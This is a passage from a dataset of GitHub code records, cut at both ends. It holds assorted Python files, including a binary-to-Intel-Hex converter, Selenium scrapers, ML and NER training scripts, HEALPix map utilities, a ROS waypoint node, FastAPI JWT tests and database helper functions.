8):0{2}X}\"\n\t\n\n\t\t\t\t\nif __name__ == \"__main__\":\n\tbytecount = 4\n\taddress = 0\n\trecordtype = 0\n\tif len(sys.argv) < 2:\n\t\tprint('v'*50)\n\t\tprint('__RiscV binary to Intel Hex converter__')\n\t\tprint(f'usage:\\n\\t {sys.argv[0]} ')\n\t\tprint('^'*50)\n\t\tsys.exit()\n\tinfilename = sys.argv[1]\n\toutfilename = sys.argv[2]\n\t\n\tihex = open(outfilename, 'w')\n\t\n\twith open(infilename, 'rb') as f:\n\t\twhile True:\n\t\t\tchunk = f.read(bytecount)\n\t\t\tif chunk:\n\t\t\t\tdata = int.from_bytes( chunk, 'little' )\n\t\t\t\tihex.write(str(checksumit(bytecount, address, recordtype, data)) + '\\n')\n\t\t\t\taddress += 1\n\t\t\telse:\n\t\t\t\tbreak\n\t\tihex.write(\":00000001FF\"+'\\n')\n\n\tihex.close()\n\tprint(\"bin2hex.. done\")\n\t\t\n","repo_name":"bbttko/PicoRV-TangNano9K","sub_path":"tools/bin2hex.py","file_name":"bin2hex.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2490777185","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Oct 31 10:17:17 2019\r\n\r\n@author: Administrator\r\n\"\"\"\r\n\r\n#算两数的最小公倍数\r\ndef lcm(num1,num2):\r\n num = num1*num2\r\n i = 1\r\n a = True\r\n while a or i<=(num1*num2):\r\n if i%num1 == 0 and i%num2 == 0:\r\n a = False\r\n return i\r\n else:\r\n i += 1\r\n\r\nprint(lcm(24,12))\r\n \r\n \r\n ","repo_name":"Jireh-Fang/one-hundred-exercise-problem","sub_path":"49.py","file_name":"49.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29609802368","text":"from selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.chrome.options import Options\nfrom datetime import date\nfrom datetime import datetime\n\nurl_file = [line.rstrip('\\n') for line in open('url.txt')]\nfile = open(\"sokrati-\"+str(date.today())+\".txt\", 'w')\nfor url in url_file:\n print('Searching for url: '+ url)\n chrome_options = Options() \n chrome_options.add_argument(\"--headless\") \n chrome_options.binary_location = 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n\n driver = webdriver.Chrome('E:/chromedriver.exe',chrome_options=chrome_options)\n driver.get(url)\n delay = 10 # seconds\n try:\n WebDriverWait(driver, delay).until(EC.presence_of_element_located((By.XPATH, \"//script[contains(@src,'sokrati')]\")))\n msg = \"Sokrati tracking found!\"\n file.write(url + '\\t' + msg + '\\n' ) \n driver.quit()\n \n except TimeoutException:\n msg = \"Sokrati tracking is not present\"\n file.write(url + '\\t' + msg + '\\n' )\n driver.quit()\nfile.close()\n \n","repo_name":"frameworkfarmer/tracker-tracker","sub_path":"tracker_tracker.py","file_name":"tracker_tracker.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38032687432","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport preprocessingData as pr\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.model_selection import KFold, cross_val_score\r\nfrom sklearn.pipeline import make_pipeline\r\nfrom sklearn.metrics import roc_curve, roc_auc_score\r\nfrom sklearn import svm\r\n\r\n\r\nclass svmClassifier:\r\n def __init__(self):\r\n self.preproc = pr.preprocessingData()\r\n self.preproc.standardizeRobData()\r\n self.preproc.getkernelacpReduction()\r\n self.dataPCA = self.preproc.dataPCA\r\n self.labels = self.preproc.labels\r\n\r\n\r\n def trainingAnalyse(self):\r\n self.score_acc = 0.80\r\n self.nlayer = 0\r\n for i in range(10000):\r\n self.X_train, self.X_test, self.y_train, self.y_test = train_test_split(self.preproc.data.values[0:768, 0:8], self.labels, test_size=0.3)\r\n self.svc = svm.SVC(kernel='rbf',)\r\n self.svc.fit(self.X_train, self.y_train)\r\n self.trainingScore = self.svc.score(self.X_train, self.y_train)\r\n self.accuracyScore = self.svc.score(self.X_test, self.y_test)\r\n if(self.accuracyScore > self.trainingScore and self.accuracyScore >= self.score_acc) :\r\n self.score_acc = self.accuracyScore\r\n print(self.score_acc)\r\n\r\n def frontieredeDecision(self):\r\n cmp = np.array(['r', 'g'])\r\n #plt.scatter(self.X_train[:,0],self.X_train[:,1],c=cmp[self.y_train],s=5,edgecolors='none')\r\n plt.scatter(self.X_test[:, 0], self.X_test[:, 1], c='none', s=5, edgecolors=cmp[self.y_test])\r\n nx, ny = 400, 400\r\n x_min, x_max = plt.xlim()\r\n y_min, y_max = plt.ylim()\r\n xx, yy = np.meshgrid(np.linspace(x_min, x_max, nx), np.linspace(y_min, y_max, ny))\r\n Z = self.svc.predict_proba(np.c_[xx.ravel(), yy.ravel()])\r\n Z = Z.reshape(xx.shape)\r\n plt.contour(xx, yy, Z, [0.5])\r\n plt.show()\r\n\r\n def crossingValidationsvm(self):\r\n pipeline = make_pipeline(svm.SVC())\r\n kf = KFold(n_splits=10, shuffle=True, random_state=1)\r\n cv_results = cross_val_score(pipeline, self.X_train, self.y_train, cv=kf, scoring=\"accuracy\")\r\n cv_results.mean()\r\n target_probabilities = pipeline.fit(self.X_train, self.y_train).predict(self.X_test)[:, 1]\r\n\r\n false_positive_rate, true_positive_rate, threshold = roc_curve(self.y_test, target_probabilities)\r\n plt.title(\"Receiver Operating Characteristic\")\r\n plt.plot(false_positive_rate, true_positive_rate)\r\n plt.plot([0, 1], ls=\"--\")\r\n plt.plot([0, 0], [1, 0], c=\".7\"), plt.plot([1, 1], c=\".7\")\r\n plt.ylabel(\"True Positive Rate\")\r\n plt.xlabel(\"False Positive Rate\")\r\n plt.show()\r\n print(roc_auc_score(self.y_test, target_probabilities))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"mallocp/Risque-diab-tique","sub_path":"svmClassifier.py","file_name":"svmClassifier.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25160803407","text":"import unittest\nfrom unittest.mock import Mock\n\nfrom fastapi import HTTPException\n\nfrom src.shared.auth_bearer_validator import AuthBearerValidator\nfrom tests.utils.bearer_token_utils import JWTGenerator\n\n\nclass TestJWTBearer(unittest.IsolatedAsyncioTestCase):\n \"\"\"Testing Auth Bearer Shared module\"\"\"\n\n def setUp(self) -> None:\n self.token_generator = JWTGenerator()\n\n def generate_mock_request_by_token(self, token: str):\n request = Mock()\n request.headers = {\"Authorization\": f\"Bearer {token}\"}\n\n return request\n\n async def test_request_with_valid_token(self):\n valid_token = self.token_generator.generate_valid_token()\n request = self.generate_mock_request_by_token(valid_token)\n\n jwt_bearer = AuthBearerValidator()\n response = await jwt_bearer.__call__(request)\n\n self.assertIsInstance(response, dict)\n\n async def test_request_with_invalid_token(self):\n invalid_token = self.token_generator.generate_invalid_token()\n request = self.generate_mock_request_by_token(invalid_token)\n\n jwt_bearer = AuthBearerValidator()\n\n try:\n await jwt_bearer.__call__(request)\n except HTTPException as err:\n self.assertEqual(err.status_code, 403)\n else:\n raise HTTPException\n\n async def test_request_with_expired_token(self):\n expired_token = self.token_generator.generate_expired_token()\n request = self.generate_mock_request_by_token(expired_token)\n\n jwt_bearer = AuthBearerValidator()\n\n try:\n await jwt_bearer.__call__(request)\n except HTTPException as err:\n self.assertEqual(err.status_code, 403)\n else:\n raise HTTPException\n","repo_name":"vschmidt/template_fastapi","sub_path":"tests/unit/shared/test_auth_bearer_validator.py","file_name":"test_auth_bearer_validator.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37973329786","text":"\"\"\"We show here how to set up a drop down list (list of predefined choices that the user can click)\"\"\"\n#tags: DropDownListButton, events handling, DropDownList, choices, drop down, drop down list, list menu, list, Labelled\n\nimport pygame, thorpy as tp\n\npygame.init()\n\nW, H = 1200, 700\nscreen = pygame.display.set_mode((W,H))\ntp.init(screen, tp.theme_human) #bind screen to gui elements and set theme\n\nbck = pygame.image.load(tp.fn(\"data/bck.jpg\")) #load some background pic for testing\nbck = pygame.transform.smoothscale(bck, (W,H))\ndef before_gui(): #add here the things to do each frame before blitting gui elements\n screen.blit(bck, (0,0)) #blit background pic\ntp.call_before_gui(before_gui) #tells thorpy to call before_gui() before drawing gui.\n\nddl1 = tp.DropDownListButton((\"One\", \"Two\", \"Three\"))\nddl1_labelled = tp.Labelled(\"First example\", ddl1)\n\nddl2 = tp.DropDownListButton((\"One\", \"Two\", \"Three\"), title=\"Two\", choice_mode=\"h\")\nddl2_labelled = tp.Labelled(\"Second example\", ddl2)\n\n#all the arguments except the first one (the actual choices) are optional:\nddl3 = tp.DropDownListButton((\"Beginner\", \"Intermediate\", \"Expert\", \"Pro\"),\n title=None, #by default, will take the first value\n choice_mode=\"v\", #'v' for vertical or 'h' for horizontal\n align=\"left\", #how to align choices in the list\n launch_nonblocking=False, #launch mode\n size_limit=(\"auto\",\"auto\"), #limit size of the list of options\n all_same_width=True, #all choices same width\n generate_shadow=(True, \"auto\"))#[0] : does generate shadow ? [1] : fast method or accurate method ? you can set [1] = \"auto\"\n\nddl3_labelled = tp.Labelled(\"Third example\", ddl3)\n\n#to get the value of any my_ddl, just call my_ddl.get_value()\n\ngroup = tp.Box([ddl1_labelled, ddl2_labelled, ddl3_labelled])\ngroup.center_on(screen)\ngroup.get_updater().launch()\npygame.quit()\n\n","repo_name":"YannThorimbert/Thorpy2","sub_path":"examples/_example_dropdownlist.py","file_name":"_example_dropdownlist.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"71568233768","text":"from __future__ import division\nimport numpy as np\nimport lib\nimport mapmod\nimport almmod\nimport fileutils\nimport psht\nimport subprocess\nimport shlex\nimport tempfile\n\ndef iter_over_all_but_one(ar, axis):\n if axis != ar.ndim - 1:\n for j in xrange(ar.shape[-1]):\n for it in iter_over_all_but_one(ar[..., j], axis):\n yield it\n else:\n if ar.ndim == 1:\n yield ar\n elif ar.ndim != 2:\n for j in xrange(ar.shape[-2]):\n for it in iter_over_all_but_one(ar[..., j, :], axis - 1):\n yield it\n else:\n for j in xrange(ar.shape[0]):\n yield ar[j, :]\n\n#def unravel_index(inds, index_\n\ndef getslice(ar, axis, ind):\n \"\"\"VERY handy utility routine to return a slice.\n\n Returns the ind'th slice along axis of array ar. Axis and ind can be lists\n or similar, in which case the nth element of axis corresponds to the nth \n element of ind\"\"\"\n\n shape = ar.shape\n if isinstance(axis, int):\n sl = (slice(None),) * axis + (ind,) + (Ellipsis,)\n elif len(axis) == 2:\n if axis[0] < axis[1]:\n sl = (slice(None),) * axis[0] + (ind[0],) + (slice(None),) * \\\n (axis[1] - axis[0] - 1) + (ind[1],) + (Ellipsis,)\n else:\n sl = (slice(None),) * axis[1] + (ind[1],) + (slice(None),) * \\\n (axis[0] - axis[1] - 1) + (ind[0],) + (Ellipsis,)\n else:\n raise NotImplementedError\n return sl\n\n\n\ndef alm2map(ad, nside):\n \"\"\"Determines (from whether pol_axis is set or not) whether or not to use\n polarization if polarization=True. If polarization=False, treats each alm\n as an independent alm.\n \"\"\"\n if ad.ordering == 'l-major':\n ad.switchordering()\n computer = psht.PshtMmajorHealpix(lmax=ad.lmax, nside=nside, alm=ad.alms,\n alm_polarization=ad.pol_axis, \n alm_axis=ad.ind_axis, \n map_axis=ad.ind_axis,\n map_polarization=ad.pol_axis)\n map = computer.alm2map()\n md = mapmod.MapData(nside, map=map, pol_axis=ad.pol_axis, \n pol_iter = ad.pol_iter, ordering='ring')\n return md\n\ndef map2alm(md, lmax, mmax=None, weights=None):\n \"\"\"Determines (from whether pol_axis is set or not) whether or not to use\n polarization if polarization=True. If polarization=False, treats each map\n as an independent map.\n \"\"\"\n if mmax is None:\n mmax = lmax\n if weights is None:\n #Try to find file based on data in md\n weights = 'weight_ring_n%05d.fits' % md.nside\n if isinstance(weights, str):\n weights = fileutils.read_file(weights)\n elif not isinstance(weights, np.ndarray):\n raise TypeError(\"Weights must be either filename or numpy array\")\n if weights.shape != (3, 2*md.nside):\n raise ValueError(\"Weights do not have the right shape\")\n computer = psht.PshtMmajorHealpix(nside=md.nside, lmax=lmax, mmax=mmax,\n map=md.map,\n alm_polarization=md.pol_axis, \n alm_axis=md.pix_axis, \n map_axis=md.pix_axis,\n map_polarization=md.pol_axis,\n weights=weights[0])\n alm = computer.map2alm()\n ad = almmod.AlmData(lmax, mmax=mmax, alms=alm, pol_axis=md.pol_axis, \n pol_iter=md.pol_iter, ordering='m-major')\n return ad\n\ndef alm2ps(ad):\n if ad.pol_axis is not None:\n if ad.pol_axis < ad.ind_axis:\n shape = list(ad.alms.shape[:ad.pol_axis] + (6,) + ad.alms.shape[ad.pol_axis+1:ad.ind_axis] + (ad.lmax + 1,) + ad.alms.shape[ad.ind_axis + 1:])\n else:\n shape = list(ad.alms.shape[:ad.ind_axis] + (ad.lmax + 1,) + ad.alms.shape[ad.ind_axis+1:ad.pol_axis] + (6,) + ad.alms.shape[ad.pol_axis + 1:])\n cd = almmod.ClData(ad.lmax, cls = np.zeros(shape), spec_axis=ad.pol_axis, spectra='all')\n else:\n shape = list(ad.alms.shape[:ad.ind_axis] + (ad.lmax + 1,) + ad.alms.shape[ad.ind_axis + 1:])\n cd = almmod.ClData(ad.lmax, cls=np.zeros(shape))\n if cd.spectra != ['TT']:\n raise NotImplementedError\n if cd.spectra == ['TT']:\n if ad.ordering == 'l-major':\n for l in range(ad.lmax + 1):\n sl = getslice(cd.cls, cd.cl_axis, l)\n ind1 = almmod.lm2ind((l, 0), lmmax=(ad.lmax, ad.mmax), \\\n ordering=ad.ordering)\n ind2 = almmod.lm2ind((l, min(l, ad.mmax)), \\\n lmmax=(ad.lmax, ad.mmax), ordering=ad.ordering)\n asl = list(getslice(ad.alms, ad.ind_axis, ind1))\n cd.cls[sl] += ad.alms[asl] ** 2\n asl[ad.ind_axis] = slice(ind1 + 1, ind2 + 1)\n cd.cls[sl] += 2 * np.sum((ad.alms[asl] * \\\n ad.alms[asl].conjugate()).real)\n cd.cls[sl] = cd.cls[sl] / (2 * l + 1)\n else:\n for l in range(ad.lmax + 1):\n sl = getslice(cd.cls, cd.cl_axis, l)\n for m in range(min(l, ad.mmax) + 1):\n asl = getslice(ad.alms, ad.ind_axis, almmod.lm2ind((l, m), \\\n lmmax=(ad.lmax, ad.mmax), ordering=ad.ordering))\n if m == 0:\n cd.cls[sl] += ad.alms[asl] ** 2\n else:\n cd.cls[sl] += 2 * (ad.alms[asl] * \\\n ad.alms[asl].conjugate()).real\n cd.cls[sl] = cd.cls[sl] / (2 * l + 1)\n return cd\n\ndef noisemap(noise_data, nside=None):\n \"\"\"Simulates a noise map.\n\n Now takes only diagonal noise values, but will eventually be able to\n simulate based on covariance matrices as well.\n\n \"\"\"\n if isinstance(noise_data, mapmod.MapData):\n #Assume that the noise is diagonal, and to be multiplied by a gaussian\n gauss = np.random.standard_normal(noise_data.map.shape)\n noisemap = gauss * noise_data.map\n noise = mapmod.MapData(nside=noise_data.nside, map=noisemap, \n pol_axis=noise_data.pol_axis, \n pol_iter=noise_data.pol_iter,\n ordering=noise_data.ordering)\n elif isinstance(noise_data, np.ndarray):\n if nside is None:\n raise ValueError(\"Must provide nside when noise_data is an array\")\n gauss = np.random.standard_normal(noise_data.shape)\n noisemap = gauss * noise_data.map\n noise = mapmod.Mapdata(nside=nside, map=noisemap)\n\n return noise\n\ndef plot(md, sig=(1,), min=None, max=None, prefix=None, ncols=None, \n common_bar=True):\n \"\"\"Uses map2png to plot a MapData map\"\"\"\n\n if prefix is None:\n prefix = 'testmap'\n\n ffile = prefix + '.fits'\n pfile = prefix + '.png'\n# if common_bar or len(sig) == 1:\n# subprocess.call(shlex.split(\"rm \" + ffile))\n# fileutils.write_file(ffile, md)\n# flags = []\n# if max is not None: flags.append('-max %f ' % max)\n# if min is not None: flags.append('-min %f ' % min)\n# for sigs in sig:\n# flags.append('-sig %2d ' % sigs)\n# if ncols is None:\n# ncols = int(np.sqrt(len(sig)))\n# flags.append('-ncol %2d' % ncols)\n# subprocess.call(shlex.split(\"map2png \" + ffile + \" \" + pfile + \n# \" -bar %s \" % ''.join(flags)))\n# subprocess.call(shlex.split(\"eog \" + pfile))\n# else:\n filelist = []\n for i in range(len(sig)):\n tffile = prefix + '%02d.fits' % i\n tpfile = prefix + '%02d.png' % i\n filelist.append(tpfile + ' ')\n subprocess.call(shlex.split(\"rm \" + tffile))\n fileutils.write_file(tffile, md, sig=(sig[i],))\n flags = []\n if max is not None: flags.append('-max %f ' % max[i])\n if min is not None: flags.append('-min %f ' % min[i])\n subprocess.call(shlex.split(\"map2png \" + tffile + \" \" + tpfile + \n \" -bar %s \" % ''.join(flags)))\n\n subprocess.call(shlex.split(\"rm \" + pfile))\n subprocess.call(shlex.split(\"montage -geometry +0+0 %s \" % ''.join(filelist) + pfile))\n subprocess.call(shlex.split(\"eog \" + pfile))\n\ndef map2gif(md, signal='all', prefix='testmap'):\n subprocess.call(shlex.split(\"rm \" + prefix + '.fits'))\n subprocess.call(shlex.split(\"rm \" + prefix + '.gif'))\n fileutils.write_file(prefix + '.fits', md)\n if signal == 'all':\n subprocess.call(shlex.split(\"map2gif -inp \" + prefix + \".fits -out \" + prefix + \".gif -bar true\"))\n subprocess.call(shlex.split(\"map2gif -inp \" + prefix + \".fits -out \" + prefix + \"2.gif -bar true -sig 2\"))\n subprocess.call(shlex.split(\"map2gif -inp \" + prefix + \".fits -out \" + prefix + \"3.gif -bar true -sig 3\"))\n","repo_name":"eirikgje/py_cmb_lib","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8951,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"43714298238","text":"import spacy\nfrom spacy.training.example import Example\nimport json\n\n# Load the spaCy English language model\nnlp = spacy.load(\"en_core_web_sm\")\n\n# Sample data with labeled football teams and players\njson_file = open('tweets2.json', encoding=\"utf8\")\ndata = json.load(json_file)\n\ntraining_data = []\nfor tweet in data:\n text = tweet['text']\n players = tweet['all_players']\n teams = tweet['all_teams']\n entities = []\n \n for player in players:\n start_idx = text.find(player)\n end_idx = start_idx + len(player)\n if start_idx != -1:\n entities.append((start_idx, end_idx, \"player\"))\n\n # Extract team entities and their spans\n for team in teams:\n start_idx = text.find(team)\n end_idx = start_idx + len(team)\n if start_idx != -1:\n entities.append((start_idx, end_idx, \"team\"))\n \n training_data.append((text, {\"entities\": entities}))\n \n\n# Prepare the data for training\ntexts = [data[0] for data in training_data]\nannotations = [data[1] for data in training_data]\n\n# Create a blank \"en\" model with the ner component\nnlp_ner = spacy.blank(\"en\")\nner = nlp_ner.create_pipe(\"ner\")\nnlp_ner.add_pipe(\"ner\")\n\n# Add the labeled entity annotations to the NER model\nfor _, annotations in training_data:\n for ent in annotations.get(\"entities\"):\n ner.add_label(ent[2])\n\n# Disable other pipeline components during training\nother_pipes = [pipe for pipe in nlp_ner.pipe_names if pipe != \"ner\"]\n\n# Training the NER model\nwith nlp_ner.disable_pipes(*other_pipes):\n optimizer = nlp_ner.begin_training()\n for _ in range(20): # You can adjust the number of iterations here\n losses = {}\n for text, annotations in zip(texts, annotations):\n nlp_ner.update([text], [annotations], drop=0.5, sgd=optimizer, losses=losses)\n print(losses)\n\n# Test the trained NER model with some examples\ntest_data = [\n \"Neymar is a skillful player.\",\n \"Arsenal is one of the top teams in England.\"\n]\n\nfor text in test_data:\n doc = nlp_ner(text)\n entities = [(ent.text, ent.label_) for ent in doc.ents]\n print(f\"Text: {text}\\nEntities: {entities}\\n\")\n","repo_name":"danielbaltruschat/transfer_rumours_server","sub_path":"nlp/unused/player_team_labeller.py","file_name":"player_team_labeller.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38177406744","text":"import os\nimport requests\nimport pytest\nimport requests_mock\nfrom tests import FIXTURES_PATH\nfrom matrix_parse.main import parse_matrix, matrix_walker, get_matrix\nimport json\nimport asyncio\n\nEXPECTED_OUTPUT_M4X4 = [\n 10, 50, 90, 130,\n 140, 150, 160, 120,\n 80, 40, 30, 20,\n 60, 100, 110, 70,\n]\n\nEXPECTED_OUTPUT_M5X3 = [\n 50, 90, 130, 140, 150,\n 160, 170, 180, 190, 80,\n 70, 60, 100, 110, 120\n]\n\nEXPECTED_OUTPUT_M6X6 = [\n 1, 2, 3, 4, 5, 6,\n 7, 8, 9, 10, 11, 12,\n 13, 14, 15, 16, 17, 18,\n 19, 20, 21, 22, 23, 24,\n 25, 26, 27, 28, 29, 30,\n 31, 32, 33, 34, 35, 36\n]\n\n\n@pytest.mark.parametrize(\n \"fixture,matrix_data_path\",\n [\n (\"matrix_4x4.txt\", 'matrix_data_4x4.json'),\n (\"matrix_5x3.txt\", 'matrix_data_5x3.json'),\n ('matrix_6x6.txt', 'matrix_data_6x6.json')\n ],\n)\ndef test_parse_matrix(fixture, matrix_data_path):\n with requests_mock.Mocker() as mocker:\n with open(os.path.join(FIXTURES_PATH, fixture)) as fixture:\n mocker.get('https://fix.ture', text=fixture.read())\n\n content = requests.get('https://fix.ture').text\n\n with open(os.path.join(FIXTURES_PATH, matrix_data_path)) as matrix_data:\n assert parse_matrix(content) == json.load(matrix_data)\n\n\n@pytest.mark.parametrize(\n \"matrix_data_path,expected_output\",\n [\n (\n 'matrix_data_4x4.json',\n EXPECTED_OUTPUT_M4X4,\n ),\n (\n 'matrix_data_5x3.json',\n EXPECTED_OUTPUT_M5X3,\n ),\n (\n 'matrix_data_6x6.json',\n EXPECTED_OUTPUT_M6X6,\n )\n ],\n)\ndef test_matrix_walker(matrix_data_path: dict, expected_output):\n with open(os.path.join(FIXTURES_PATH, matrix_data_path)) as matrix_data:\n assert matrix_walker(json.load(matrix_data)) == expected_output\n","repo_name":"LilDrugHill/task-avito-tech-python-trainee-assignment","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3984340508","text":"from selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nimport math\nimport time \n\nlink = \"http://suninjuly.github.io/get_attribute.html\"\n \n\ntry:\n def calc(x):\n return str(math.log(abs(12*math.sin(int(x)))))\n\n browser = webdriver.Chrome(executable_path=r'/home/sinegubov/environments/chromedriver')\n browser.get(link)\n\n Pict = browser.find_element_by_id(\"treasure\")\n \n Pict_value = Pict.get_attribute(\"valuex\")\n \n y = calc(Pict_value)\n\n input1 = browser.find_element_by_css_selector(\"input#answer\")\n input1.send_keys(y)\n\n checkbox = browser.find_element_by_css_selector(\"input#robotCheckbox\")\n checkbox.click()\n button2 = browser.find_element_by_css_selector(\"input#robotsRule\")\n button2.click()\n button = browser.find_element_by_xpath(\"//button[@class='btn btn-default']\")\n button.click()\n\nexcept Exception as error:\n\tprint(f'Произошла ошибка, вот почему: {error}')\nfinally:\n # успеваем скопировать код за 30 секунд\n time.sleep(10)\n # закрываем браузер после всех манипуляций\n browser.quit()\n #driver.close()\n #driver.quit()\n \n# не забываем оставить пустую строку в конце файла\n","repo_name":"Sinegubov/Stepik-Selenium","sub_path":"Lessons_2/lesson2_1_step7.py","file_name":"lesson2_1_step7.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27303808046","text":"''' Giới thiệu về đệ quy '''\n'''\nĐệ quy là một mảng kiến thức nâng cao, ở Python thì nó không thường xuyên được dùng đến, do cách xử lí của Python \ncó thể sử dụng những cấu trúc vòng lặp đơn giản mà không cần dùng tới đệ quy. \nNhưng dù sao thì đây cũng là một kĩ thuật khá hữu dụng mà bạn đọc nên biết. Nó cũng chỉ đơn giản là việc chính nó gọi nó.\n'''\n\n# VÍ DỤ MINH HỌA\ndef cal_sum(lst):\n if not lst: # tương đương if len(lst) == 0:\n return 0\n else:\n return lst[0] + cal_sum(lst[1:])\n\ncal_sum([1, 2, 3, 4])\ncal_sum([1, 2, 3, 4, 5])\n\n# Đệ quy theo phong cách Python\n# Đệ quy và vòng lặp","repo_name":"nhatgiau/PythonwithZaooo-coban-","sub_path":"bai22.py","file_name":"bai22.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29578829708","text":"#!/usr/bin/env python\n# license removed for brevity\nimport rospy\nfrom std_msgs.msg import String\nfrom geometry_msgs.msg import Twist\nfrom nav_msgs.msg import Odometry\nfrom geometry_msgs.msg import PoseStamped\nfrom geometry_msgs.msg import Pose\nfrom move_base_msgs.msg import MoveBaseActionResult\nx = 0;\nnext = False;\ndef result_callback(data):\n next = True;\n return;\n\ndef nextObjective():\n objective = PoseStamped();\n x = x+10;\n objective.pose.position.x = x;\n objective.pose.position.y = 0;\n objective.pose.position.z = 0;\n return objective;\n\ndef trajectoire(pub):\n if(next):\n objective = nextObjective();\n next = False;\n pub.publish(objective);\n return;\n\n\ndef waypoint_follow():\n pub = rospy.Publisher('/move_base_simple/goal', PoseStamped, queue_size=10)\n rospy.Subscriber(\"/move_base/result\",MoveBaseActionResult,result_callback);\n rospy.init_node('waypoint_follow', anonymous=True)\n rate = rospy.Rate(10) # 10hz\n while not rospy.is_shutdown():\n trajectoire(pub);\n rate.sleep();\n\nif __name__ == '__main__':\n try:\n waypoint_follow()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"fifinani/ROB_MOB","sub_path":"catkin_ws/src/waypoint_follow/scripts/waypoint_follow.py","file_name":"waypoint_follow.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16099831554","text":"from databases import Database\nfrom sqlalchemy import and_\nfrom typing import List\nimport logging\n\nfrom core.database.helpers import build_model_from_row, write_db\nfrom core.database.tables.indicator import get_indicator_table\nfrom core.models.indicator import IndicatorInModel, IndicatorModel\nfrom core.enums.statuses import BottifyStatus\n\nindicator_table = get_indicator_table()\n\n\nasync def create_indicator(database: Database, indicator_in: IndicatorInModel):\n if not isinstance(indicator_in, IndicatorInModel):\n logging.error(\n f\"Create Indicator:Input must be IndicatorInModel:Got: {type(indicator_in)}\"\n )\n return False\n\n query = indicator_table.insert()\n return await write_db(database, query, indicator_in.dict())\n\n\nasync def read_indicator_by_id(database: Database, indicator_id: int):\n if not isinstance(indicator_id, int):\n logging.error(\n f\"Read Indicator by ID : ID must be an Int : Got {type(indicator_id)}\"\n )\n return None\n query = (\n indicator_table.select().where(indicator_table.c.id == indicator_id).limit(1)\n )\n row = await database.fetch_one(query)\n return build_model_from_row(row, IndicatorModel)\n\n\nasync def read_all_indicators(database: Database, limit: int):\n indicators = []\n if not isinstance(limit, int):\n logging.error(f\"Read All Indicators:Input Must be an Int - Got: {type(limit)}\")\n return indicators\n query = indicator_table.select().limit(limit)\n async for row in database.iterate(query):\n indicators.append(build_model_from_row(row, IndicatorModel))\n if not indicators:\n logging.error(f\"Read All Indicators:No Results\")\n return indicators\n\n\nasync def read_indicators_by_strategy_id(\n database: Database, strategy_id: int, limit: int\n):\n indicators = []\n if not isinstance(strategy_id, int):\n logging.error(\n f\"Read All Indicators:Input Must be an Int - Got: {type(strategy_id)}\"\n )\n return indicators\n if not isinstance(limit, int):\n logging.error(\n f\"Read Indicators By Strategy ID : Limit Must be an Int : Got {type(limit)}\"\n )\n return indicators\n query = (\n indicators.select()\n .where(indicator_table.c.strategy_id == strategy_id)\n .limit(limit)\n )\n async for row in database.iterate(query):\n indicators.append(build_model_from_row(row, IndicatorModel))\n if not indicators:\n logging.error(f\"Read Indicators By Strategy ID : No Results\")\n return indicators\n\n\nasync def read_indicators_by_strategy_ids(\n database: Database, strategy_ids: List[int], limit: int\n):\n indicators = []\n\n query = (\n indicator_table.select()\n .where(indicator_table.c.strategy_id.in_([strategy_ids]))\n .limit(limit)\n )\n async for row in database.iterate(query):\n indicators.append(build_model_from_row(row, IndicatorModel))\n if not indicators:\n logging.error(f\"Read Indicators By Strategy IDs : No Results\")\n return indicators\n\n\nasync def read_active_indicators_by_definition_id(\n database: Database, definition_id: str\n):\n indicators = []\n\n query = indicator_table.select().where(\n and_(\n indicator_table.c.definition_id == definition_id,\n indicator_table.c.status == BottifyStatus.Active.value,\n )\n )\n async for row in database.iterate(query):\n indicators.append(build_model_from_row(row, IndicatorModel))\n if not indicators:\n logging.error(\n f\"Read Active Indicators By Definition ID : No Results : Definition ID {str(definition_id)}\"\n )\n return indicators\n\n\nasync def update_indicator_status_by_strategy_id(\n database: Database, strategy_id: int, new_status: BottifyStatus\n):\n if not isinstance(new_status, BottifyStatus):\n logging.error(\n f\"Update Indicator Status By Strategy ID : New Status Must be Type BottifyStatus - Got: {type(new_status)}\"\n )\n query = (\n indicator_table.update()\n 